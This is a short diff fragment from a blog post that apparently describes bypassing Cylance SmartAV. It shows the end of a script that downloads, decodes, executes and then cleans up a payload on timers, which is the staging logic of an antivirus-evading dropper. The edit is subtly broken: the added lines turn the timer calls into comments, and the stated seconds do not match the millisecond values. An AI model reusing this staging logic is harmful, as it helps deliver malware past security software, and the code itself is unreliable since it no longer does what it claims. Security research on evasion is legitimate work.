slaeryan/slaeryan.github.io/posts/cylance-smartav-bypass.md

 	window.close();
 }
 downloadpayload();
-setTimeout(decodepayload, 30000); // CHANGE THE SECONDS
+// Wait for download to complete setTimeout(decodepayload, 30000); // 40s - CHANGE THE SECONDS
-setTimeout(executepayload, 40000); // CHANGE THE SECONDS
+// Wait for decoding to complete setTimeout(executepayload, 40000); // 50s - CHANGE THE SECONDS
-setTimeout(cleanup, 50000); // CHANGE THE SECONDS
+// Wait for execution to complete setTimeout(cleanup, 50000); // 60s - CHANGE THE SECONDS
 </script>

 </head>